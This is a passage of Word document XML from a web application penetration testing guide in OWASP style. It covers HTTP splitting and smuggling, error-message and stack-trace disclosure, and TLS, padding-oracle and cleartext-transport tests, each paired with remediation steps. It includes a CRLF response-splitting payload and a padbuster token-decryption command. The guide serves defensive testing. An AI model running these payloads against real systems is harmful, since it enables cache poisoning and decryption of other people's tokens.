        <w:t xml:space="preserve">OTG-INPVAL-016  —  Testing for HTTP Splitting/Smuggling</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 Netcat</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Objective: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Determine whether CRLF injection into headers can split an HTTP response into two (response splitting), or whether inconsistent front-end/back-end parsing of Content-Length/Transfer-Encoding allows request smuggling.</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Inject CRLF sequences into any parameter reflected into a response header (e.g., a redirect Location header) to attempt response splitting.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">For request smuggling, test discrepancies between how the front-end proxy and back-end server interpret ambiguous Content-Length/Transfer-Encoding headers (CL.TE / TE.CL patterns) using raw, manually crafted requests.</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param=foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2035%0d%0a%0d%0a&lt;html&gt;Sorry,%20System%20Down&lt;/html&gt;</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Reject or strip CR/LF characters from any user input reflected into response headers.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="70"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Ensure front-end and back-end components agree strictly on request framing (Content-Length vs Transfer-Encoding); prefer HTTP/2 end-to-end where feasible, which is not subject to this class of smuggling.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:sectPr>
          <w:headerReference w:type="default" r:id="rId23"/>
          <w:footerReference w:type="default" r:id="rId24"/>
          <w:pgSz w:w="12240" w:h="15840" w:orient="portrait"/>
          <w:pgMar w:top="1350" w:right="1350" w:bottom="1350" w:left="1350" w:header="708" w:footer="708" w:gutter="0"/>
          <w:pgNumType/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CATEGORY 8</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1F3864" w:sz="8" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="180" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">Error Handling</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Error handling testing checks whether the application discloses excessive internal detail (stack traces, database errors, internal paths) through error conditions, which can materially assist an attacker in profiling and exploiting the system.</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3200"/>
        <w:gridCol w:w="6600"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3200"/>
            <w:shd w:fill="DCE6F1" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Category Code</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6600"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">ERR</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3200"/>
            <w:shd w:fill="DCE6F1" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Number of Test Cases</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6600"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3200"/>
            <w:shd w:fill="DCE6F1" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Test ID Range</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6600"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">OTG-ERR-001 – OTG-ERR-002</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="90" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">OTG-ERR-001  —  Analysis of Error Codes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Locate error codes/messages generated by the application, web server, application server, or database, and assess what sensitive information they leak.</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Systematically trigger error conditions across every identified input point (invalid types, out-of-range values, malformed requests).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Collect and review every distinct error message/page for internal paths, software versions, query fragments, or stack details.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Correlate error-message patterns with the technology fingerprint gathered earlier.</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curl "https://target.com/item?id=abc"  (submit a non-numeric value to a numeric-only parameter)</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Return generic, uniform error messages to end users in all environments; log full detail server-side only.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="70"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Disable framework debug/development modes in production.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="90" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">OTG-ERR-002  —  Analysis of Stack Traces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invalid input, unexpected access patterns, or flow bypass attempts trigger a raw stack trace disclosure.</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Submit invalid or empty input to fields expecting a specific format.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Submit input containing non-alphanumeric characters or query syntax likely to break naive parsing.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Attempt to access internal pages without authentication, and attempt to bypass the expected application flow (e.g., skipping a required prior step).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Review every resulting response for a raw stack trace.</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curl "https://target.com/api/resource" -d ""  (empty required body)</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Configure the application framework's production error handler to suppress stack traces entirely.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="70"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Centralize exception handling so no unhandled exception can propagate a raw trace to the HTTP response.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:sectPr>
          <w:headerReference w:type="default" r:id="rId25"/>
          <w:footerReference w:type="default" r:id="rId26"/>
          <w:pgSz w:w="12240" w:h="15840" w:orient="portrait"/>
          <w:pgMar w:top="1350" w:right="1350" w:bottom="1350" w:left="1350" w:header="708" w:footer="708" w:gutter="0"/>
          <w:pgNumType/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CATEGORY 9</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1F3864" w:sz="8" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="180" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">Cryptography</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Cryptography testing evaluates the strength and correct implementation of transport-layer encryption and other cryptographic protections used to safeguard sensitive data in transit.</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3200"/>
        <w:gridCol w:w="6600"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3200"/>
            <w:shd w:fill="DCE6F1" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Category Code</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6600"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">CRYPST</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3200"/>
            <w:shd w:fill="DCE6F1" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Number of Test Cases</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6600"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3200"/>
            <w:shd w:fill="DCE6F1" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Test ID Range</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6600"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">OTG-CRYPST-001 – OTG-CRYPST-003</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="90" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">OTG-CRYPST-001  —  Testing for Weak SSL/TLS Ciphers, Insufficient Transport Layer Protection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testssl.sh, SSL Labs, SSLScan, Nmap ssl-enum-ciphers</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Objective: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Identify the SSL/TLS configuration in use and detect weak protocols/ciphers or known vulnerabilities (e.g., RC4, BEAST, CRIME, POODLE, Heartbleed).</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Run a comprehensive TLS scanner against the target's HTTPS endpoint.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Review results for deprecated protocol versions (SSLv2/3, TLS 1.0/1.1), weak cipher suites (RC4, export ciphers, NULL ciphers), and known named vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Verify certificate validity, key length, and signature algorithm strength.</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testssl.sh https://target.com</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="30"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="3DDC84"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">nmap --script ssl-enum-ciphers -p 443 target.com</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Disable SSLv2/3 and TLS 1.0/1.1; support TLS 1.2 and 1.3 only.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="70"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Disable weak/export/NULL cipher suites; prioritize AEAD ciphers (AES-GCM, ChaCha20-Poly1305).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="70"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Keep certificates current with a strong key length (RSA &gt;= 2048-bit or ECC equivalent) and modern signature algorithm (SHA-256+).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="90" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">OTG-CRYPST-002  —  Testing for Padding Oracle</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PadBuster, Poracle, python-paddingoracle, POET</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Objective: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Determine whether the application leaks distinguishable error behavior between valid-padding-but-invalid-data and invalid-padding ciphertext, enabling a padding oracle attack to decrypt data without the key.</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Identify any application functionality accepting an encrypted, client-supplied token (e.g., ViewState, encrypted cookies/parameters) using CBC-mode encryption.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Systematically modify ciphertext bytes and compare the three possible application responses: valid decrypt, decrypt-but-garbled-data-error, and padding-error.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">If the three states are distinguishable, use an automated tool to fully decrypt (and potentially forge) the token.</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padbuster https://target.com/page.aspx encryptedtoken 8 -encoding 0</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Use authenticated encryption modes (AES-GCM) instead of unauthenticated CBC mode.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="70"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Return identical, generic error responses regardless of the specific decryption/padding failure reason.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="90" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">OTG-CRYPST-003  —  Testing for Sensitive Information Sent via Unencrypted Channels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 curl, Wireshark</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Objective: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Confirm that sensitive data (credentials, PINs, session identifiers, tokens, cookies, regulated personal/financial data) is never transmitted over an unencrypted channel.</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Proxy or capture full application traffic and review every request/response for sensitive data transmitted over plain HTTP.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Check for mixed content (HTTPS pages loading HTTP sub-resources) that could leak session cookies.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Verify all forms handling regulated data (payment, personal identifiers) submit exclusively over HTTPS.</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curl -v http://target.com/api/login  (confirm the endpoint is not reachable or does not accept credentials over plain HTTP)</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Enforce HTTPS site-wide with HSTS; eliminate any HTTP-accessible endpoints that handle sensitive data.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="70"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Resolve all mixed-content warnings.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:sectPr>
          <w:headerReference w:type="default" r:id="rId27"/>
          <w:footerReference w:type="default" r:id="rId28"/>
          <w:pgSz w:w="12240" w:h="15840" w:orient="portrait"/>
          <w:pgMar w:top="1350" w:right="1350" w:bottom="1350" w:left="1350" w:header="708" w:footer="708" w:gutter="0"/>
          <w:pgNumType/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CATEGORY 10</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1F3864" w:sz="8" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="180" w:before="300"/>
